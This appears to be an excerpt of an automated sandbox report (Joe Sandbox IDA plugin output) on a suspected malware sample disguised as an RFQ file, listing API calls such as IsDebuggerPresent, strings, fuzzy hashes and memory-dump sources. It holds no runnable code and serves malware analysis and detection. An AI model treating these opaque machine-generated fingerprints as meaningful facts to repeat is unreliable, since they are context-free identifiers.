                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 78c638cf9bc3df551e83e05eac72a4b5f15d9ffe6ce303ae0c1564ccb89d6810
                                              • Instruction ID: 5ac208d4a525e154a90540d7279cf8a527af49aef7e7a4b37aa709dd7810a7a8
                                              • Opcode Fuzzy Hash: 78c638cf9bc3df551e83e05eac72a4b5f15d9ffe6ce303ae0c1564ccb89d6810
                                              • Instruction Fuzzy Hash: 71E0617290432C27D7109795AC05F97F7ACEF41731F00005BFD10D3050D6A09A4587E0
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001381CA
                                                • Part of subcall function 00103598: _doexit.LIBCMT ref: 001035A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 519a18cebb3c457540258815e2c9ba44f0df4a7b102856d88fe3a32c018a6c43
                                              • Instruction ID: cdbbc7bb7b584ca13204ca5060132ac5153ffa10e2a47a44ac5ccbbe51e22b4d
                                              • Opcode Fuzzy Hash: 519a18cebb3c457540258815e2c9ba44f0df4a7b102856d88fe3a32c018a6c43
                                              • Instruction Fuzzy Hash: 71D02B323C431836D21133E96D0BFC535484B19B11F004026FB88554E38FD144C242DC
                                              APIs
                                                • Part of subcall function 0011B564: _memset.LIBCMT ref: 0011B571
                                                • Part of subcall function 00100B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0011B540,?,?,?,000E100A), ref: 00100B89
                                              • IsDebuggerPresent.KERNEL32(?,?,?,000E100A), ref: 0011B544
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000E100A), ref: 0011B553
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0011B54E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: bb738823e68a40fa5e4f690e7de25a8fa09373caec01acdcf67bc7cfc2deb473
                                              • Instruction ID: 17a99a1901381cba510e20bdd088d35e1c4af052322a5949426bdfc9a3547f0f
                                              • Opcode Fuzzy Hash: bb738823e68a40fa5e4f690e7de25a8fa09373caec01acdcf67bc7cfc2deb473
                                              • Instruction Fuzzy Hash: B9E06D742047518FD365EF28E9443827BE0EB04704F04893DE486C2B50D7F4D584CFA1
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001398CB
                                              • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 001398D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: d731ba7b1b40da59e558d4d01a314e337a828414e281167d03a446cdbdb889fc
                                              • Instruction ID: c4357ca083d5b7dcc208c645985f79d2ebab27dc4312bb7cc09c9e4435f51d15
                                              • Opcode Fuzzy Hash: d731ba7b1b40da59e558d4d01a314e337a828414e281167d03a446cdbdb889fc
                                              • Instruction Fuzzy Hash: E0C00271145180BAEA211B77FC0DD873E3DE7CAF52B12016CB221954B586A50096D634